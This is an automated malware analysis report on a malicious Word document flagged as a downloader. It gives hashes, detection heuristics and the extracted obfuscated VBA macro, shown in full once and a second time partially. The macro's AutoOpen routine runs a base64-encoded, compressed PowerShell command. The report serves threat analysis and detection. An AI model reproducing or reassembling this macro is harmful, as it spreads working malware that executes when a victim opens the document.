Office (OLE) malware analysis — malicious · 3071c1aab216bebf

MALICIOUS

Office (OLE)

111.8 KB Created: 2018-06-11 22:06:00 Authoring application: Microsoft Office Word First seen: 2018-07-04

MD5: 7034461236c7ad387f0ed247ef0e083a SHA-1: 371d4924c85384dd33634b18316a85770be2dda1 SHA-256: 3071c1aab216bebfd0b660d46fec100c0b4e16a861a8cea5f21b04100e805613

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, indicating an attempt to execute external commands. The presence of 'Autoopen' and 'Shell' in the heuristic firings, along with the VBA script's structure, strongly suggests the macro is designed to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.

Heuristics 7

ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

AuuEJ = YQNhT
fXScw = PcWBv + Shell(WuNPo + Chr(zYaVi + vbKeyP + VubiSDifRK) + "owers" + fjsTzcUwVvB + JRQbVHwU + QdHLjZUAFpY + TiJztXv + DLSNvi, 75499 - 75499)
TAnjXc = CLng(75695 * CSng(ffNJB + ChrB(GkHNL + CInt(26876))))

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub Autoopen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10031 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10031 bytes
SHA-256: `fad3e86f37dbd0da6c9f4ff1fade4a74a4c46d82bbea24a9a5e62c4e52794293`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ErBzOVRArzoZ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function fXScw() On Error Resume Next AirfQ = CLng(90297 * CSng(MsQdJ + ChrB(dTzzL + CInt(68026)))) tKMiM = Int(swYjS) HKXBXq = Wfslwf KZGETo = mdqRN MCPoJ = dCwGSc WMUAZ = wasTp QidUh = CLng(63425 * CSng(JXdUQE + ChrB(wCiLTo + CInt(54584)))) SJSdQ = Int(OsUjZ) sTzhR = jSlts vzSvs = zBrFMU DQhvi = krkjf AuuEJ = YQNhT fXScw = PcWBv + Shell(WuNPo + Chr(zYaVi + vbKeyP + VubiSDifRK) + "owers" + fjsTzcUwVvB + JRQbVHwU + QdHLjZUAFpY + TiJztXv + DLSNvi, 75499 - 75499) TAnjXc = CLng(75695 * CSng(ffNJB + ChrB(GkHNL + CInt(26876)))) srmFwh = Int(nDoWww) dVBTHv = YVjlD SoJAWF = aJAibv TbqrM = vdOGt SOUWF = tvMwu End Function Sub Autoopen() On Error Resume Next AqBBUV = CLng(44093 * CSng(MoEwip + ChrB(AqpaC + CInt(13807)))) niGnv = Int(izuVh) qVAuI = jBrdJX PvsFXY = jhDTvh NKNtj = bzCAw hTFbJY = vfOpuX fXScw qWIShz = CLng(52909 * CSng(Wrika + ChrB(QQssJ + CInt(81422)))) XaGtuM = Int(uwUTVm) EqkSw = NwOzZ aiOVzk = GSvCZm pYXWLO = kMaIZM dbMJUw = HjdWio End Sub Attribute VB_Name = "GIoLjJPpZrl" Function fjsTzcUwVvB() On Error Resume Next ZtpfME = CLng(58744 * CSng(JaMNM + ChrB(ObazZ + CInt(67093)))) CYaUWT = Int(XfHkrL) ihdaf = iLAEv IJEAf = ZSWUO plkid = cWADk zWuKzr = VYUKk sSibI = "HeLL -e KA" + "AgAG4AZQB3" + "AC" + "0AbwBCAEoARQBj" + "AHQAIAAgA" + "EkATwAuAEMATwB" + "tAF" + "AAcgBlAFMAUwB" fcbRt = CLng(98860 * CSng(SRlto + ChrB(hhcZB + CInt(9010)))) KDIOP = Int(fztnV) APwqAE = Eabfl VzJqt = SGKIbT CYULZ = QTnkjq VuAwiX = NtXVH WKNVBiL = "JAG8AbgAuAEQ" + "AZQ" + "BmAEw" + "AQQBUA" + "GUAcwBUAFI" + "ARQBBAG0A" + "KAAgAFsASQ" + "BvAC4Ab" + "QBlAE0A" + "bwBS" oCUqGX = CLng(44401 * CSng(CikPBC + ChrB(jiMaz + CInt(35762)))) XFLaEv = Int(IBwEao) zziMT = TMPjjV jLKvI = LfOfjT ntjmKb = HhkiO iJLpbt = tSwrCw nVaTIR = "AFk" + "AcwB0AHIARQBh" + "AE0AXQAg" + "AFsAcwBZ" + "AHMAdABlAE" cikSzt = CLng(85768 * CSng(ZfdZFI + ChrB(zabhcB + CInt(4811)))) YDmki = Int(zpjNi) ZzSlUm = jjMCoa TVPUTr = OLOKIK cpuLWY = BIqMq SnMBw = jBbZP VYCdXBYUw = "0ALgBjAE8AbgBWA" + "GUAcgB0AF0" + "AOg" + "A6AGYAUgBvAG0AY" + "gBhAHMARQA2AD" qJLlEa = CLng(24110 * CSng(AHqSqR + ChrB(dRNZH + CInt(57353)))) HbzNM = Int(acAQiS) OJQEQA = WLzuL IGjOAH = VBjlq OBXGa = YlnTBJ HPwwd = BfpUs wDOVIkH = "QAcwB0AFIAaQB" + "uAE" + "cAK" + "AAnAFYAWgBCA" + "GYAU" PXCKMZ = CLng(58463 * CSng(ClMwF + ChrB(HmvVm + CInt(66077)))) qAAWF = Int(jpiZj) TKPWaa = XvHVDA GzOkTi = hYWCo TzYTM = SlMrQU sLJjiw = Oziaw jmGzNa = "wA4AE0AdwBG" + "AE0AVwAv" + "AFMAaAA0A" + "EsAMwBkAEMA" + "bABGAGgAR" + "gBrAFIA" fjsTzcUwVvB = sSibI + WKNVBiL + nVaTIR + VYCdXBYUw + wDOVIkH + jmGzNa End Function Function JRQbVHwU() On Error Resume Next zUmlt = CLng(38292 * CSng(TaZXnJ + ChrB(hFtGz + CInt(29425)))) qzXps = Int(SrUOz) Giwzb = ziaSlm VanJFc = ijHVOw OUcFK = RCojF IAhzY = lsWfi NMDMurSL = "UgBqA" + "E0AYgBj" + "AEoAdwBPAEY" + "AdQBtAEQ" + "ANABL" + "AGsAMgB" + "lADAAYQB" + "tACs" + "AYQBXA" OmVmZa = CLng(54507 * CSng(fziNwM + ChrB(MiSlDE + CInt(75854)))) bBijI = Int(Ddjptr) EfcNH = mLSTw mZOEt = ibTtkq UIcTwX = VCIzp wjAIJ = jXVDoZ DOPKoPWZn = "DkASABiAHQA" + "SABQAHYAdQBSAG" + "oA" + "YwB" + "uAHYAZ" + "wBSAHUAe" + "gB1AC8A" + "YwBQ" + "ADgAZQBiADYAcgB" + "sA" PPPFKu = CLng(73146 * CSng(nLKrT + ChrB(trkROO + CInt(40691)))) uaKkCH = Int(wFntI) pFzzF = CIYqQ mpfllZ = UlVpu riAoGW = KnElmT KSVWj = vPRoNT rmoawSBbtn = "FoASwB" + "IAGIASA" + "BEAEwAUQBEAFQA" + "RAA5AE" + "EA" + "RQByAFAAQwB" + "yAEwARwBNAHYARw" + "BXAFYAeAB" + "OAH" + "YALwBVAHIAeQBy" ioXTP = CLng(6448 * CSng(NYBUS + ChrB(Sizlt + CInt(98115)))) QACQz = Int(zfcNL) mJPWQl = jwwmQ EQcQP = vOBzil UKDrk = qtfKC jzXQV = NmPvp jaLGuPbJkMN = "AEM" + "AV" + "QBxACsAQQBPA" + "EkAdgBrAEkANg" + "AxAEEAawBPAF" + "IAbAB4AFIAMgA" + "zAGoAagB" + "RAHoANABtAHEA" + "WQ" OMhQM = CLng(70274 * CSng(hlJRL + ChrB(ELbaHY + CInt(10125)))) IjjXw = Int(dUzrYV) cYdZjv = VWaiMk ImLIX = wGjBtO iMlRs = AbnwAa GDlFzL = QUinj FKQjiS = "BSAEEAS" + "QB1ADEAWQ" + "BrA" + "HMAbwB4AEwATAB" kjWrb = CLng(61438 * CSng(rPJlI + ChrB(VkoVoK + CInt(64476)))) duVbDi = Int(nOizi) FTFvWU = lquzw pdcwu = CHHmAQ zSEBf = azPRiZ pZInA = iwsWK GQVtvZnP = "JAE8AdwBqA" + "GEAc" + "wBtAEcASgAyAGs" + "AR" + "QB" + "rADAAQg" + "B1ADAAegBWA" jUfiw = CLng(63762 * CSng(fwXph + ChrB(PMVHaM + CInt(88123)))) cnczU = Int(flcFwt) vSuRRj = tTSkaz IIoSJR = HhDjiv uWRso = UtaqI PfJUrY = AWcnn IoLTti = "GUAVwB" + "aAHgAO" + "AB3AE0AOAB" + "YADAALwAxA" + "DgAZw" + "B6AFUAdwBqAGcAc" + "gBrAEY" cvnlrh = CLng(74580 * CSng(EzwArm + ChrB(QPizJj + CInt(2280)))) zNLKI = Int(CRiiGM) jIjIW = KjMTAl jHuqdF = lqXfWi ChOWla = kHwons dktLZj = vXsAA ZaUAJ = "AQw" + "A2AC8AcABI" + "ADEAWABIAGIAa" + "gBxAD" + "kAVQBaAHkATABH" + "AEUARg" JRQbVHwU = NMDMurSL + DOPKoPWZn + rmoawSBbtn + jaLGuPbJkMN + FKQjiS + GQVtvZnP + IoLTti + ZaUAJ End Function Function QdHLjZUAFpY() On Error Resume Next WqkDmr = CLng(90544 * CSng(zwzPL + ChrB(zzvBqN + CInt(70617)))) FdUzw = Int(HJWVkp) uWuCv = hdmwwN LvbqKn = OkGjo MApcci = ZFcBw PCiThX = HWMifK wqtjAQzznvz = "BxADEA" + "ZQBvA" + "DkASABLAGc" + "ARwB" + "OADQ" + "AVQB3AF" + "IAZAA5AG4" + "AQ" pBJQKO = CLng(4924 * CSng(hnJURs + ChrB(FSarP + CInt(44667)))) jQZMEl = Int(oHwRhj) vMqks = VqKMGr RtHnva = StrwKR sfMDkL = JGkHWr sGMFMu = uAJVG jwVjz = "gBGAGYAMAA" + "xAF" + "UAVwBRADAA" + "awBtAHIA" + "cgBS" + "AHAATQB5A" + "EcAVgB" + "6AH" + "AAS" + "QBWAFcATQB" FCVrab = CLng(71442 * CSng(LzJVjz + ChrB(nXjZi + CInt(29030)))) miszX = Int(wfDid) oGlsj = GzhIDk zRGdcv = afPqw EPifub = KJACiz bPsibI = aDrCa MdnnnF = "4AEMARwBjAHoAaw" + "BRA" + "FUAKwBqA" + "HkAdQB0AHE" + "ATwBlAFAALwBI" FvIrut = CLng(7699 * CSng(qVBOcs + ChrB(nREwc + CInt(34443)))) KnlPqL = Int(MmdTom) AJIkv = ltqPwQ mmnDwU = kUFfD NiiYun = HmIvO fLRzVQ = PrazZV ouKdkb = "ADcAawBa" + "AFo" + "AUABWADAA" + "LwBUADcAVAB1A" + "DgAWQBCA" + "GoAZgBR" + "AFUA" + "UwAr" ddfDc = CLng(62988 * CSng(ZGKRU + ChrB(Jozir + CInt(80066)))) pzTXk = Int(ddVEj) ZTddGE = hdFEG AFQasv = kDffJ TOCZE = aSvrj tZYIn = tNsjJN QfUPlfQAZ = "ADgA" + "WgBMAGMAMwA" + "0AFUAMwBvAGcA" + "TwBUAFQAZg" + "BCAFQAT" + "ABiAHcARA" dIcOW = CLng(76705 * CSng(TwlEiE + ChrB(CfMFN + CInt(68748)))) wWibP = Int(lvPjEp) atwDY = iquoT jiriji = dnimun sMYjB = ohaIj jJBYE = OzjMuN jbmodPvMdu = "BNAGQAdQBqAH" + "UAcgA5AGcARgA4" + "ADkAOQA4ADk" + "ALwA2AGEAWABjA" + "DIAaABBAHoA" + "LwBLADAASQBL" + "AFEA" + "ZQBjAC8AYgB6AHA" + "ASgB" + "YAH" QdHLjZUAFpY = wqtjAQzznvz + jwVjz + MdnnnF + ouKdkb + QfUPlfQAZ + jbmodPvMdu End Function Function TiJztXv() On Error Resume Next FILjwH = CLng(7759 * CSng(SLWSL + ChrB(TpBIiB + CInt(44971)))) mcOZEf = Int(afRKzv) dwdBcs = ziGtu IiELLL = WjUWC arfEI = rcMCi ZfjowI = KkhwbG riowrIX = "gAWgBSAG" + "gA" + "eAAzAFQANgBlADc" + "ASwA3AC8A" nnVudH = CLng(97394 * CSng(RWSZw + ChrB(CSwbZd + CInt(73593)))) ZhlMqs = Int(tvDwIX) HRYXj = NMWYK HSkUCc = HOnIR GRXbO = pKzLiC uRSMK = CskUI RaISYoGLV = "VABGA" + "FMAZg" + "BvACsAdAAwAF" + "MAagBXAFUANgBY" + "AGgAUgBQAEkA" + "RQBZADc" + "ASgB" + "1A" + "DEAMQA3AC8A" BWvQqT = CLng(17201 * CSng(HcDql + ChrB(wUnJH + CInt(12124)))) BhvoB = Int(wOYWwO) MEuuH = VvuSOc CQiFaN = JAozb rMsjGH = kvrasC kWHPh = aafjS MBjcjWdd = "awBwADAAb" + "QA" + "5AHEATwBZAG" + "gASwBYA" + "EIAawAwAFUASgBk" + "AGYAMwA3" + "AEgAYQBWAHUA" + "UgBCAE" + "UAZABwAEMAQwBaA" + "DcAMQB1AHIAQwB" iMrMQu = CLng(36527 * CSng(AICKL + ChrB(BqGYH + CInt(25408)))) wRmsZ = Int(QOQjM) KYOtj = jZjOcU DaKkTH = FXkuE qbCEj = puBimw wbnoj = SwWsGd MkIzhX = "BAFkANQAx" + "AHMAUwA" + "4AGQAegA3AHA" + "ASgBGA" + "FMAaw" + "AwAFAAQgBIADU" + "AeABBAGIAaQBBA" ZoLmoU = CLng(78276 * CSng(lEWii + ChrB(iCBrX + CInt(75339)))) LzRiAF = Int(XTiwam) BjOuS = HLWRK pnuUB = qAOqtE PCsRVZ = swcTn EioAaz = vPwdz NjCIAjVipI = "DYASABMAHcA" + "PQA9ACcA" + "KQAsAFsAaQBvAC4" + "AYwBPAE0" + "AcAByA" + "EUAcwBzA" + "GkATwBu" + "AC4AYwBvAG0" + "AUAByAEUAUwBTA" NkloKp = CLng(20164 * CSng(DFPtA + ChrB(HMrKah + CInt(9285)))) LLOQtj = Int(zDPSoM) GJSdc = BZZGZI jYnCR = jYZatv PECzbM = oFhszE dmmHr = PIaPNA VSnPOcA = "EkAbwBOAE0ATwB" + "EAGUAXQA6ADoAZA" + "BlAEMAbwBtAHAAc" + "gBlAFMAcwApACA" + "Af" + "AAgAEYA" + "bwBSAEUAYQB" + "DAGgA" TiJztXv = riowrIX + RaISYoGLV + MBjcjWdd + MkIzhX + NjCIAjVipI + VSnPOcA End Function Function DLSNvi() On Error Resume Next cuhjY = CLng(65731 * CSng(awWaiN + ChrB(birvFN + CInt(25561)))) lnSCK = Int(Hdmmb) CtXzU = GpjQM iInijU = nwWJt VXjTT = nDMaiG bqGYZV = pYCacu iHKJczYbzA = "ewB" + "uAGUAdwAtAG8AQ" + "gBKAEUAYwB0ACAA" + "IABzAH" + "kAcw" + "B0AGUATQA" + "uAGkATw" + "AuAFMAVABSAG" + "UAYQBNAF" inBfk = CLng(57623 * CSng(wrWVNf + ChrB(ZRhFX + CInt(79804)))) RjaznS = Int(zVIqYS) PKvzc = czkCM CPHUVF = YNHbi LDBVNf = NQKGmH bQSwYk = PMpAnl OkuPpMR = "IAZ" + "QBhAEQA" + "ZQB" + "yACgAIAAk" + "AF8ALABbAFQAZQ" + "B4AFQALgB" + "FA" + "G4AQwBvAGQASQ" + "BuAEcAXQA6A" + "DoAQQBzAGMA" tuIjM = CLng(2598 * CSng(JbdWW + ChrB(bmFAi + CInt(26294)))) dIvKD = Int(zvrLUa) UUVBWZ = iRooa MWdHp = Zbrlz jODVSQ = wbDHR dJHiL = HkBlb iKXjvEwFtQ = "aQ" + "BpAC" + "AAKQB" + "9ACkALgBS" + "AGUAQQ" kWDAT = CLng(56409 * CSng(VEqKCJ + ChrB(YfiaJO + CInt(23254)))) LISwf = Int(sNidc) iuFvI = YvznzE LvcFb = MGjLuh zRdqL = aGRiZi iqQEY = ObTVP GLpnrnc = "BkAHQATwBFAE" + "4A" + "RAAoACkAf" + "AAgAC4AIAAoAC" + "AAJABzA" + "Gg" DBPzB = CLng(67289 * CSng(OmcHR + ChrB(bSdPu + CInt(33586)))) XJsWp = Int(mlTudv) jIiLI = vNTiG zvwqkM = EMjtJ HYvZur = LDZToS iWpDi = nqhqvi wEcBTac = "ARQBsAGwASQBEA" + "FsAM" + "QBdACsAJABT" + "AGgAZQBMA" + "GwASQ" + "BkAFsA" + "MQAzAF0AKwAnA" + "HgAJwApAA" + "==" DLSNvi = iHKJczYbzA + OkuPpMR + iKXjvEwFtQ + GLpnrnc + wEcBTac End Function

SHA-256: fad3e86f37dbd0da6c9f4ff1fade4a74a4c46d82bbea24a9a5e62c4e52794293

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ErBzOVRArzoZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fXScw()
On Error Resume Next
AirfQ = CLng(90297 * CSng(MsQdJ + ChrB(dTzzL + CInt(68026))))
tKMiM = Int(swYjS)
HKXBXq = Wfslwf
KZGETo = mdqRN
MCPoJ = dCwGSc
WMUAZ = wasTp
QidUh = CLng(63425 * CSng(JXdUQE + ChrB(wCiLTo + CInt(54584))))
SJSdQ = Int(OsUjZ)
sTzhR = jSlts
vzSvs = zBrFMU
DQhvi = krkjf
AuuEJ = YQNhT
fXScw = PcWBv + Shell(WuNPo + Chr(zYaVi + vbKeyP + VubiSDifRK) + "owers" + fjsTzcUwVvB + JRQbVHwU + QdHLjZUAFpY + TiJztXv + DLSNvi, 75499 - 75499)
TAnjXc = CLng(75695 * CSng(ffNJB + ChrB(GkHNL + CInt(26876))))
srmFwh = Int(nDoWww)
dVBTHv = YVjlD
SoJAWF = aJAibv
TbqrM = vdOGt
SOUWF = tvMwu
End Function
Sub Autoopen()
On Error Resume Next
AqBBUV = CLng(44093 * CSng(MoEwip + ChrB(AqpaC + CInt(13807))))
niGnv = Int(izuVh)
qVAuI = jBrdJX
PvsFXY = jhDTvh
NKNtj = bzCAw
hTFbJY = vfOpuX
fXScw
qWIShz = CLng(52909 * CSng(Wrika + ChrB(QQssJ + CInt(81422))))
XaGtuM = Int(uwUTVm)
EqkSw = NwOzZ
aiOVzk = GSvCZm
pYXWLO = kMaIZM
dbMJUw = HjdWio
End Sub


Attribute VB_Name = "GIoLjJPpZrl"
Function fjsTzcUwVvB()
On Error Resume Next
ZtpfME = CLng(58744 * CSng(JaMNM + ChrB(ObazZ + CInt(67093))))
CYaUWT = Int(XfHkrL)
ihdaf = iLAEv
IJEAf = ZSWUO
plkid = cWADk
zWuKzr = VYUKk
sSibI = "HeLL -e KA" + "AgAG4AZQB3" + "AC" + "0AbwBCAEoARQBj" + "AHQAIAAgA" + "EkATwAuAEMATwB" + "tAF" + "AAcgBlAFMAUwB"
fcbRt = CLng(98860 * CSng(SRlto + ChrB(hhcZB + CInt(9010))))
KDIOP = Int(fztnV)
APwqAE = Eabfl
VzJqt = SGKIbT
CYULZ = QTnkjq
VuAwiX = NtXVH
WKNVBiL = "JAG8AbgAuAEQ" + "AZQ" + "BmAEw" + "AQQBUA" + "GUAcwBUAFI" + "ARQBBAG0A" + "KAAgAFsASQ" + "BvAC4Ab" + "QBlAE0A" + "bwBS"
oCUqGX = CLng(44401 * CSng(CikPBC + ChrB(jiMaz + CInt(35762))))
XFLaEv = Int(IBwEao)
zziMT = TMPjjV
jLKvI = LfOfjT
ntjmKb = HhkiO
iJLpbt = tSwrCw
nVaTIR = "AFk" + "AcwB0AHIARQBh" + "AE0AXQAg" + "AFsAcwBZ" + "AHMAdABlAE"
cikSzt = CLng(85768 * CSng(ZfdZFI + ChrB(zabhcB + CInt(4811))))
YDmki = Int(zpjNi)
ZzSlUm = jjMCoa
TVPUTr = OLOKIK
cpuLWY = BIqMq
SnMBw = jBbZP
VYCdXBYUw = "0ALgBjAE8AbgBWA" + "GUAcgB0AF0" + "AOg" + "A6AGYAUgBvAG0AY" + "gBhAHMARQA2AD"
qJLlEa = CLng(24110 * CSng(AHqSqR + ChrB(dRNZH + CInt(57353))))
HbzNM = Int(acAQiS)
OJQEQA = WLzuL
IGjOAH = VBjlq
OBXGa = YlnTBJ
HPwwd = BfpUs
wDOVIkH = "QAcwB0AFIAaQB" + "uAE" + "cAK" + "AAnAFYAWgBCA" + "GYAU"
PXCKMZ = CLng(58463 * CSng(ClMwF + ChrB(HmvVm + CInt(66077))))
qAAWF = Int(jpiZj)
TKPWaa = XvHVDA
GzOkTi = hYWCo
TzYTM = SlMrQU
sLJjiw = Oziaw
jmGzNa = "wA4AE0AdwBG" + "AE0AVwAv" + "AFMAaAA0A" + "EsAMwBkAEMA" + "bABGAGgAR" + "gBrAFIA"
fjsTzcUwVvB = sSibI + WKNVBiL + nVaTIR + VYCdXBYUw + wDOVIkH + jmGzNa
End Function
Function JRQbVHwU()
On Error Resume Next
zUmlt = CLng(38292 * CSng(TaZXnJ + ChrB(hFtGz + CInt(29425))))
qzXps = Int(SrUOz)
Giwzb = ziaSlm
VanJFc = ijHVOw
OUcFK = RCojF
IAhzY = lsWfi
NMDMurSL = "UgBqA" + "E0AYgBj" + "AEoAdwBPAEY" + "AdQBtAEQ" + "ANABL" + "AGsAMgB" + "lADAAYQB" + "tACs" + "AYQBXA"
OmVmZa = CLng(54507 * CSng(fziNwM + ChrB(MiSlDE + CInt(75854))))
bBijI = Int(Ddjptr)
EfcNH = mLSTw
mZOEt = ibTtkq
UIcTwX = VCIzp
wjAIJ = jXVDoZ
DOPKoPWZn = "DkASABiAHQA" + "SABQAHYAdQBSAG" + "oA" + "YwB" + "uAHYAZ" + "wBSAHUAe" + "gB1AC8A" + "YwBQ" + "ADgAZQBiADYAcgB" + "sA"
PPPFKu = CLng(73146 * CSng(nLKrT + ChrB(trkROO + CInt(40691))))
uaKkCH = Int(wFntI)
pFzzF = CIYqQ
mpfllZ = UlVpu
riAoGW = KnElmT
KSVWj = vPRoNT
rmoawSBbtn = "FoASwB" + "IAGIASA" + "BEAEwAUQBEAFQA" + "RAA5AE" + "EA" + "RQByAFAAQwB" + "yAEwARwBNAHYARw" + "BXAFYAeAB" + "OAH" + "YALwBVAHIAeQBy"
ioXTP = CLng(6448 * CSng(NYBUS + ChrB(Sizlt + CInt(98115))))
QACQz = Int(zfcNL)
mJPWQl = jwwmQ
EQcQP = vOBzil
UKDrk = qtfKC
jzXQV = NmPvp
jaLGuPbJkMN = "AEM" + "AV" + "QBxACsAQQBPA" + "EkAdgBrAEkANg" + "AxAEEAawBPAF" + "IAbAB4AFIAMgA" + "zAGoAagB" + "RAHoANABtAHEA" + "WQ"
OMhQM = CLng(70274 * CSng(hlJRL + ChrB(ELbaHY + CInt(10125))))
IjjXw = Int(dUzrYV)
cYdZjv = VWaiMk
ImLIX = wGjBtO
iMlRs = AbnwAa
GDlFzL = QUinj
FKQjiS = "BSAEEAS" + "QB1ADEAWQ" + "BrA" + "HMAbwB4AEwATAB"
kjWrb = CLng(61438 * CSng(rPJlI + ChrB(VkoVoK + CInt(64476))))
duVbDi = Int(nOizi)
FTFvWU = lquzw
pdcwu = CHHmAQ
zSEBf = azPRiZ
pZInA = iwsWK
GQVtvZnP = "JAE8AdwBqA" + "GEAc" + "wBtAEcASgAyAGs" + "AR" + "QB" + "rADAAQg" + "B1ADAAegBWA"
jUfiw = CLng(63762 * CSng(fwXph + ChrB(PMVHaM + CInt(88123))))
cnczU = Int(flcFwt)
vSuRRj = tTSkaz
IIoSJR = HhDjiv
uWRso = UtaqI
PfJUrY = AWcnn
IoLTti = "GUAVwB" + "aAHgAO" + "AB3AE0AOAB" + "YADAALwAxA" + "DgAZw" + "B6AFUAdwBqAGcAc" + "gBrAEY"
cvnlrh = CLng(74580 * CSng(EzwArm + ChrB(QPizJj + CInt(2280))))
zNLKI = Int(CRiiGM)
jIjIW = KjMTAl
jHuqdF = lqXfWi
ChOWla = kHwons
dktLZj = vXsAA
ZaUAJ = "AQw" + "A2AC8AcABI" + "ADEAWABIAGIAa" + "gBxAD" + "kAVQBaAHkATABH" + "AEUARg"
JRQbVHwU = NMDMurSL + DOPKoPWZn + rmoawSBbtn + jaLGuPbJkMN + FKQjiS + GQVtvZnP + IoLTti + ZaUAJ
End Function
Function QdHLjZUAFpY()
On Error Resume Next
WqkDmr = CLng(90544 * CSng(zwzPL + ChrB(zzvBqN + CInt(70617))))
FdUzw = Int(HJWVkp)
uWuCv = hdmwwN
LvbqKn = OkGjo
MApcci = ZFcBw
PCiThX = HWMifK
wqtjAQzznvz = "BxADEA" + "ZQBvA" + "DkASABLAGc" + "ARwB" + "OADQ" + "AVQB3AF" + "IAZAA5AG4" + "AQ"
pBJQKO = CLng(4924 * CSng(hnJURs + ChrB(FSarP + CInt(44667))))
jQZMEl = Int(oHwRhj)
vMqks = VqKMGr
RtHnva = StrwKR
sfMDkL = JGkHWr
sGMFMu = uAJVG
jwVjz = "gBGAGYAMAA" + "xAF" + "UAVwBRADAA" + "awBtAHIA" + "cgBS" + "AHAATQB5A" + "EcAVgB" + "6AH" + "AAS" + "QBWAFcATQB"
FCVrab = CLng(71442 * CSng(LzJVjz + ChrB(nXjZi + CInt(29030))))
miszX = Int(wfDid)
oGlsj = GzhIDk
zRGdcv = afPqw
EPifub = KJACiz
bPsibI = aDrCa
MdnnnF = "4AEMARwBjAHoAaw" + "BRA" + "FUAKwBqA" + "HkAdQB0AHE" + "ATwBlAFAALwBI"
FvIrut = CLng(7699 * CSng(qVBOcs + ChrB(nREwc + CInt(34443))))
KnlPqL = Int(MmdTom)
AJIkv = ltqPwQ
mmnDwU = kUFfD
NiiYun = HmIvO
fLRzVQ = PrazZV
ouKdkb = "ADcAawBa" + "AFo" + "AUABWADAA" + "LwBUADcAVAB1A" + "DgAWQBCA" + "GoAZgBR" + "AFUA" + "UwAr"
ddfDc = CLng(62988 * CSng(ZGKRU + ChrB(Jozir + CInt(80066))))
pzTXk = Int(ddVEj)
ZTddGE = hdFEG
AFQasv = kDffJ
TOCZE = aSvrj
tZYIn = tNsjJN
QfUPlfQAZ = "ADgA" + "WgBMAGMAMwA" + "0AFUAMwBvAGcA" + "TwBUAFQAZg" + "BCAFQAT" + "ABiAHcARA"
dIcOW = CLng(76705 * CSng(TwlEiE + ChrB(CfMFN + CInt(68748))))
wWibP = Int(lvPjEp)
atwDY = iquoT
jiriji = dnimun
sMYjB = ohaIj
jJBYE = OzjMuN
jbmodPvMdu = "BNAGQAdQBqAH" + "UAcgA5AGcARgA4" + "ADkAOQA4ADk" + "ALwA2AGEAWABjA" + "DIAaABBAHoA" + "LwBLADAASQBL" + "AFEA" + "ZQBjAC8AYgB6AHA" + "ASgB" + "YAH"
QdHLjZUAFpY = wqtjAQzznvz + jwVjz + MdnnnF + ouKdkb + QfUPlfQAZ + jbmodPvMdu
End Function
Function TiJztXv()
On Error Resume Next
FILjwH = CLng(7759 * CSng(SLWSL + ChrB(TpBIiB + CInt(44971))))
mcOZEf = Int(afRKzv)
dwdBcs = ziGtu
IiELLL = WjUWC
arfEI = rcMCi
ZfjowI = KkhwbG
riowrIX = "gAWgBSAG" + "gA" + "eAAzAFQANgBlADc" + "ASwA3AC8A"
nnVudH = CLng(97394 * CSng(RWSZw + ChrB(CSwbZd + CInt(73593))))
ZhlMqs = Int(tvDwIX)
HRYXj = NMWYK
HSkUCc = HOnIR
GRXbO = pKzLiC
uRSMK = CskUI
RaISYoGLV = "VABGA" + "FMAZg" + "BvACsAdAAwAF" + "MAagBXAFUANgBY" + "AGgAUgBQAEkA" + "RQBZADc" + "ASgB" + "1A" + "DEAMQA3AC8A"
BWvQqT = CLng(17201 * CSng(HcDql + ChrB(wUnJH + CInt(12124))))
BhvoB = Int(wOYWwO)
MEuuH = VvuSOc
CQiFaN = JAozb
rMsjGH = kvrasC
kWHPh = aafjS
MBjcjWdd = "awBwADAAb" + "QA" + "5AHEATwBZAG" + "gASwBYA" + "EIAawAwAFUASgBk" + "AGYAMwA3" + "AEgAYQBWAHUA" + "UgBCAE" + "UAZABwAEMAQwBaA" + "DcAMQB1AHIAQwB"
iMrMQu = CLng(36527 * CSng(AICKL + ChrB(BqGYH + CInt(25408))))
wRmsZ = Int(QOQjM)
KYOtj = jZjOcU
DaKkTH = FXkuE
qbCEj = puBimw
wbnoj = SwWsGd
MkIzhX = "BAFkANQAx" + "AHMAUwA" + "4AGQAegA3AHA" + "ASgBGA" + "FMAaw" + "AwAFAAQgBIADU" + "AeABBAGIAaQBBA"
ZoLmoU = CLng(78276 * CSng(lEWii + ChrB(iCBrX + CInt(75339))))
LzRiAF = Int(XTiwam)
BjOuS = HLWRK
pnuUB = qAOqtE
PCsRVZ = swcTn
EioAaz = vPwdz
